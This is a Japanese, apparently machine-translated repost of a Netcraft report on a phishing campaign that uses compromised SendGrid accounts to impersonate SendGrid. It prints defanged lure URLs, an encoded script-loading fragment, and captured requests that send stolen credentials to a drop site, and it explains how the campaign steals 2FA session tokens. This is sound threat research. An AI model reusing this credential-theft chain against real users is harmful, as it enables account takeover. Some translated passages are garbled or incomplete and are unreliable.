日本語版
最新ニュース
科学&テクノロジー

Phishception – SendGrid が悪用されて、自身になりすましたフィッシング攻撃をホストします

Netcraft は最近、犯罪者が SendGrid のサービスを悪用して、SendGrid 自体になりすましたフィッシング キャンペーンを開始したことを観察しました。 現在は Twilio が所有するこの有名なプロバイダーにより、大規模な電子メールの送信がシンプルかつ柔軟になります。 規模に加えて、高い配信可能性と機能豊富なツールが約束されているため、Sendgrid は合法的な企業にとって人気のサービスであり、犯罪者の標的になる可能性が高くなります。 観察されたキャンペーンでは、送信方法が調査されている間に被害者のアカウントが停止された、または最近の支払い失敗により被害者のアカウントが削除対象としてマークされていると主張するなど、さまざまな複雑な誘い文句が使用されており、実際の情報を隠すために他の SendGrid 機能と組み合わせられています。悪意のあるリンクの宛先。 Netcraft がキャンペーン中に確認したフィッシングメールの 1 つのスクリーンショット。 キャンペーンの背後にいる犯罪者が使用した SendGrid のクリック追跡機能、悪意のあるリンクは、SendGrid によってホストされている追跡リンクの背後にマスクされています。 実際の宛先リンクは URL パラメータにエンコードされているため、技術に精通した受信者であっても、それをたどることなく宛先を判断することはできません。 https://u684436[.]ct[.]sendgrid.net/ls/click?upn=MlKqR181cN-2FwVofVyYroZohPHYCFmcOANwhWCUdTCBwPOc8txaiCuzTlogC05KN3LNFQ-2BuY0GGAqsU1nral07J5ZAzdZaZBAuJ7sV0-2BXHfumQD5I7-2FksS6M-2Bkp-2BkG47JcUbzDR8JwfwRM53-2BjxY8Q39KSfdEFQ9435uyTBM5TtspkyY3jUnvibv5C-2BopzMIluG2QhFh3lCZT2E5thEQQlvnZzjigw0zd2QIpDJ1mDMyGAOP9FKPeH-2BubdRj8uMW7TYzi-2FryttpaWt-2FacBOIgmTucX37Bpzwo8hDwYWOfxtiszu0DQpSrDO3oXpdkl-2B4s7wZAW0B-2FGDFBUzYJTXj74HRI9K2dpGobo82sm-2BazB2pF4rB-2BmwcxWwFL-2FpuLyZHB39O28qMVDOVLLbjWvpdUCCWXeMbVjwqJJJ-2FJJcfiX9cVoMVr52N2vZshdxGLBhIHeg5gMDA8qUev9sXguFrcp8VNlV-2FhMxARF1RUvbSCJCUd-2Faf2xJXq65WP0ikjyx7BLg1hmUr3QcV9IstauGE08g-3D-3DmcLN_IrVKFt61B0RSPoIcLeWyNg52nFk05lKq9QPi-2FlqEDp6KgcjnqupRcHzKcBBn7PVo8-2BxeSCeDL5jOu-2Bx5wws5UKOwmCQCTy6wc-2FTAihp-2FZilUgXpstXJftrsxyCzWfWHkMtlCi92uoep-2BB-2BEJJpbK-2BlDe4wqa-2FR0sOOAlwWz6aTEHqnEACadwVCrFtoPCBG68mO0yF5ItaBS0v1i7sukWtkhsoqWJbxt7FUowSScDsyM-3D 電子メールのヘッダーを調べると、フィッシングメールが SendGrid のインフラストラクチャを使用して送信されていることがわかります。 Received: from s.wfbtzhsv.outbound-mail.sendgrid.net (s.wfbtzhsv.outbound-mail.sendgrid.net [159.183.224.104]) (using TLSv1.3 with cipher…

Phishception – SendGrid が悪用されて、自身になりすましたフィッシング攻撃をホストします

1707399489
2024-02-07 09:47:21

Netcraft は最近、犯罪者が SendGrid のサービスを悪用して、SendGrid 自体になりすましたフィッシング キャンペーンを開始したことを観察しました。 現在は Twilio が所有するこの有名なプロバイダーにより、大規模な電子メールの送信がシンプルかつ柔軟になります。 規模に加えて、高い配信可能性と機能豊富なツールが約束されているため、Sendgrid は合法的な企業にとって人気のサービスであり、犯罪者の標的になる可能性が高くなります。

観察されたキャンペーンでは、送信方法が調査されている間に被害者のアカウントが停止された、または最近の支払い失敗により被害者のアカウントが削除対象としてマークされていると主張するなど、さまざまな複雑な誘い文句が使用されており、実際の情報を隠すために他の SendGrid 機能と組み合わせられています。悪意のあるリンクの宛先。

Netcraft がキャンペーン中に確認したフィッシングメールの 1 つのスクリーンショット。

キャンペーンの背後にいる犯罪者が使用した SendGrid のクリック追跡機能、悪意のあるリンクは、SendGrid によってホストされている追跡リンクの背後にマスクされています。 実際の宛先リンクは URL パラメータにエンコードされているため、技術に精通した受信者であっても、それをたどることなく宛先を判断することはできません。

https://u684436[.]ct[.]sendgrid.net/ls/click?upn=MlKqR181cN-2FwVofVyYroZohPHYCFmcOANwhWCUdTCBwPOc8txaiCuzTlogC05KN3LNFQ-2BuY0GGAqsU1nral07J5ZAzdZaZBAuJ7sV0-2BXHfumQD5I7-2FksS6M-2Bkp-2BkG47JcUbzDR8JwfwRM53-2BjxY8Q39KSfdEFQ9435uyTBM5TtspkyY3jUnvibv5C-2BopzMIluG2QhFh3lCZT2E5thEQQlvnZzjigw0zd2QIpDJ1mDMyGAOP9FKPeH-2BubdRj8uMW7TYzi-2FryttpaWt-2FacBOIgmTucX37Bpzwo8hDwYWOfxtiszu0DQpSrDO3oXpdkl-2B4s7wZAW0B-2FGDFBUzYJTXj74HRI9K2dpGobo82sm-2BazB2pF4rB-2BmwcxWwFL-2FpuLyZHB39O28qMVDOVLLbjWvpdUCCWXeMbVjwqJJJ-2FJJcfiX9cVoMVr52N2vZshdxGLBhIHeg5gMDA8qUev9sXguFrcp8VNlV-2FhMxARF1RUvbSCJCUd-2Faf2xJXq65WP0ikjyx7BLg1hmUr3QcV9IstauGE08g-3D-3DmcLN_IrVKFt61B0RSPoIcLeWyNg52nFk05lKq9QPi-2FlqEDp6KgcjnqupRcHzKcBBn7PVo8-2BxeSCeDL5jOu-2Bx5wws5UKOwmCQCTy6wc-2FTAihp-2FZilUgXpstXJftrsxyCzWfWHkMtlCi92uoep-2BB-2BEJJpbK-2BlDe4wqa-2FR0sOOAlwWz6aTEHqnEACadwVCrFtoPCBG68mO0yF5ItaBS0v1i7sukWtkhsoqWJbxt7FUowSScDsyM-3D

電子メールのヘッダーを調べると、フィッシングメールが SendGrid のインフラストラクチャを使用して送信されていることがわかります。

Received: from s.wfbtzhsv.outbound-mail.sendgrid.net (s.wfbtzhsv.outbound-mail.sendgrid.net [159.183.224.104])
(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)
 key-exchange X25519 server-signature ECDSA (P-384) server-digest SHA384)
(No client certificate requested)
by REDACTED (Postfix) with ESMTPS id 684BCE1862
for ; Tue, 12 Dec 2023 18:49:17 +0000 (UTC)

SendGrid は「業界をリードする 99% の納品率”。 正規の企業であっても、ユーザーの受信トレイに電子メールを正常に配信するのに苦労することがあるため、フィッシング キャンペーンに SendGrid を使用することが犯罪者にとっていかに魅力的であるかは簡単にわかります。

1 つの事実は、電子メールが正規のものではないことを示しています。キャンペーンでは SendGrid の電子メール サーバーが使用されていますが、 “から:” アドレスには SendGrid のドメイン名は使用されません。 代わりに、電子メールは無関係なさまざまなドメイン名から送信されます。 すべてのドメイン名は他の SendGrid 顧客であるようであり、犯罪者が自分のアカウントを登録せずに、侵害された SendGrid アカウントを使用していることを示唆しています。

Netcraft は、アカウントがキャンペーンに使用された少なくとも 9 社を特定しました。 これらの企業は、クラウド ホスティング、エネルギー、ヘルスケア、教育、不動産、人材採用、出版など、さまざまな業界にまたがっています。

侵害された SendGrid アカウントの使用は、SendGrid がフィッシング キャンペーンの標的となる理由を説明します。犯罪者は侵害されたアカウントを使用して、サイクル内でさらに SendGrid アカウントを侵害し、新しい SendGrid アカウントを安定的に供給することができます。

侵害された SendGrid アカウントは、侵害された企業になりすましたフィッシングメールの送信に使用される可能性もあります。 企業は多くの場合、SPF ポリシーと DKIM ポリシーを使用して、SendGrid が自社のドメイン名から電子メールを送信することを承認します。 したがって、フィッシングメールはチェックに合格し、本物であるように見えます。

電子メール内の追跡リンクをクリックすると、被害者は次の場所にリダイレクトされます。 JSPen。 このコード エディターを使用すると、ページ全体を URL フラグメント内 (ハッシュ (#) 文字以降のすべて) に保存できます。

https://jspen[.]co/?utm_campaign=website&utm_medium=email&utm_source=sendgrid.com#JTNDJTczJTYzJTcyJTY5JTcwJTc0JTIwJTczJTcyJTYzJTNEJTIyJTY4JTc0JTc0JTcwJTczJTNBJTJGJTJGJTY3JTcyJTY5JTY0JTZGJTZFJTczJTc1JTcwJTcwJTZGJTcyJTc0JTM4JTM3JTMyJTMzJTM2JTM3JTM0JTMzJTM5JTJFJTYxJTdBJTc1JTcyJTY1JTY2JTY0JTJFJTZFJTY1JTc0JTJGJTc1JTcwJTY0JTYxJTc0JTY1JTczJTJFJTZBJTczJTIyJTNFJTIwJTNDJTJGJTczJTYzJTcyJTY5JTcwJTc0JTNF

URL フラグメントはサーバーに送信されず、被害者のブラウザ内でのみ使用されるため、この攻撃の検出とブロックはより困難になります。 JSPen サービスの運営者は、それが悪意のある目的で悪用されていることを知らない可能性があります。

URL フラグメントをデコードすると、単一のものが明らかになります。

Azure のようなクラウド サービスは、無料枠とクレジットが利用できるため、詐欺師にとって魅力的です。 Azure Front Door は Azure の無料利用枠には含まれていませんが、Azure は新規顧客に $200 クレジット、任意の Azure サービスに使用できます。

JavaScript ファイルは高度に難読化されており、変数と関数には意味のない名前が付けられ、すべての空白が削除されています。

難読化された JavaScript ファイルの一部のスクリーンショット。

ファイルの難読化を解除すると、フィッシング サイトのコンテンツが AES 暗号化文字列内に保存されていることが明らかになり、実行時に解読されて Web ページに書き込まれます。 犯罪者はこれらの手法を利用して、人間のアナリストや自動システムがスクリプトに悪意があるかどうかを判断することを困難にします。

部分的に難読化が解除された AES 復号化コードのスクリーンショット。 このフィッシング サイトは、CDN でホストされている CryptoJS ライブラリのコピーに依存して、AES 復号化ルーチンを提供します。

フィッシング サイト自体は、実際の SendGrid ログイン ページの説得力のあるレプリカです。

偽の SendGrid ログイン ページ。

正規の SendGrid ログイン ページ。

認証情報を入力すると、フィッシング サイトは SendGrid の API にユーザー名とパスワードが正しいかどうかを確認するよう要求します。

POST /v3/public/tokens HTTP/1.1
Host: api.sendgrid.com 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 450
Origin: https://jspen.co
Referer: https://jspen.co/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Te: trailers
Connection: close

{"username":"[REDACTED]","password":"[REDACTED]"}

時々、裏技 単純なフィッシングの試みを検出するため 無効なユーザー名またはパスワードを入力することです。 主要なフィッシング サイトはあらゆる認証情報を素直に受け入れるため、エラー メッセージが表示されなければ、そのサイトが偽物であることがわかります。 ただし、このような巧妙なフィッシング サイトは本物のように見え、無効なログイン試行を拒否し、ユーザーに再試行を求めます。

JSPen と Azure Front Door の両方で、ユーザーは静的ファイルのホストのみを許可されます。 フィッシング サイトは、盗んだ認証情報を別のドロップ サイト (pnp-api) に配信します。[.]com – AJAX を使用:

GET /sendgrid/post.php?eimo=[REDACTED]&peso=[REDACTED]&MFA= HTTP/1.1
Host: pnp-api.com 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://jspen.co
Referer: https://jspen.co/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Te: trailers
Connection: close

pnp-api を初めて知りました[.]私たちの 2023年11月調査。 そのホームページは、 ララベル PHP フレームワーク。 その古さとコンテンツの欠如から、ドロップ サイトは侵害されたサイトではなく、犯罪者によって目的的に登録された可能性が高いことを意味します。

pnp-api[.]comでした Wild West Domains に登録されています、GoDaddyの子会社。 さまざまな監視場所からの ping 時間を測定すると、次のことが確認されます。 オーロロジック それをホストします ドイツ、フランクフルトのデータセンター

被害者が有効なユーザー名とパスワードを入力すると、フィッシング サイトは SendGrid の API を使用して、二要素認証コードを被害者の電話に送信するよう要求します。 次に、SendGrid の 2 要素認証フォームのコピーが表示されます。

フィッシング サイトの 2 要素認証フォームのスクリーンショット。

また、フィッシング サイトは、被害者が入力した 2 要素認証コードが正しいことを SendGrid の API を使用して検証します。 それは継続し、被害者に間違っている場合は再試行するよう促します。

被害者が正しいコードを入力すると、フィッシング サイトはドロップ サイトに別のリクエストを送信します。 ただし、2 要素コードはドロップ サイトに送信されません。 代わりに、SendGrid API によって提供されるセッション トークンを送信し、犯罪者が被害者のアカウントを乗っ取るための時間を与えます。2 要素認証コードは数分しか有効ではないかもしれませんが、セッション トークンははるかに長い間有効です。

最後に、被害者は SendGrid の公式 Web サイトにリダイレクトされますが、おそらく自分のアカウントが侵害されたことに気づいていません。

この記事の執筆時点では、JSPen と Azure でホストされている悪意のある JavaScript ファイルは利用できなくなりました。

Netcraft はサイバー犯罪との戦いの中心地に位置しているため、新しいフィッシング キャンペーンを迅速に特定、監視し、対応することができます。 消費者は Netcraft の ブラウザ拡張機能とアプリ フィッシング攻撃やその他の脅威から身を守るため。 フィッシングの標的となっている組織は、 中断および削除サービス 悪意のあるコンテンツがブロックされ、迅速かつ効率的に削除されるようにします。 お問い合わせ 詳しく知ることができ。

Netcraft の研究者は 2 月 1 日に、悪用報告メカニズムを通じて SendGrid に連絡し、この攻撃とその後の研究について知らせました。

#Phishception #SendGrid #が悪用されて自身になりすましたフィッシング攻撃をホストします

執筆者について: nipponese

Nipponese News編集部は、国内外のニュースを日本語で分かりやすくお届けします。